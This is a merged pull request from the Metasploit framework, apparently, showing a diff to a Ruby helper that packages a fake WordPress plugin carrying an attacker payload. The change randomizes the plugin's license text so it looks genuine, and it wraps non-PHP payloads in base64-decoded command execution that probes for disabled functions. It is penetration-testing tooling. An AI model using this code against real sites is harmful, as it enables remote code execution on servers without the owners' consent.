Merge pull request rapid7#19467 from jvoisin/wordpress_portable

Make lib/msf/core/exploit/remote/http/wordpress/admin.rb a tad more portable

Author: jheysel-r7

lib/msf/core/exploit/remote/http/wordpress/admin.rb

@@ -55,11 +55,21 @@ def generate_plugin(plugin_name, payload_name)
  * Version: #{Faker::App.semantic_version}
  * Author: #{Faker::Name.name}
  * Author URI: #{Faker::Internet.url}
- * License: GPL2
+ * License: #{['GPLv2', 'GPLv2 or later', 'GPL-2.0-or-later'].sample}
  */
 ?>)
 
-    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    php_code = "<?php #{payload.encoded} ?>"
+    if target['Arch'] != ARCH_PHP
+      dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+      php_code = <<-END_OF_PHP_CODE
+        #{php_preamble(disabled_varname: dis)}
+        $c = base64_decode("#{Rex::Text.encode_base64(payload.encoded)}");
+        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+      END_OF_PHP_CODE
+      php_code = php_code + '?>'
+    end
+
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
     zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)